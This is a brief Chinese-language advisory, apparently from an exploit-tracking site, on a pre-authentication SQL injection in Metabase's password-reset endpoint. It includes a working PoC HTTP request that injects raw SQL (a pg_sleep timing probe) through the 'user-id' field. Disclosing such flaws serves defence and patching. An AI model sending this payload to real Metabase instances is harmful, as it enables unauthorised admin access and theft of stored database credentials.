Metabase SQL注入致远程代码执行漏洞

2026-08-10 16:02:06 Metabase PoC Public

Description

Metabase 存在一个严重的预认证SQL注入漏洞(CVSS 3.1评分:10.0)。该漏洞位于 /api/session/reset_password 端点,未经身份验证的远程攻击者可利用此漏洞向Metabase应用数据库注入任意SQL代码。成功利用可实现权限提升,直接获取实例管理员访问权限,进而导致敏感数据泄露(包括已连接数据库的存储凭据)、应用配置篡改及任意数据导出。目前该漏洞已被检测到在野利用,属于高风险。

PoC

POST /api/session/reset_password HTTP/1.1
Host: 
Content-Type: application/json

{"token":"test","password":"test@123Q","user-id":{"select":{"raw":"(SELECT pg_sleep(5))"}}}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities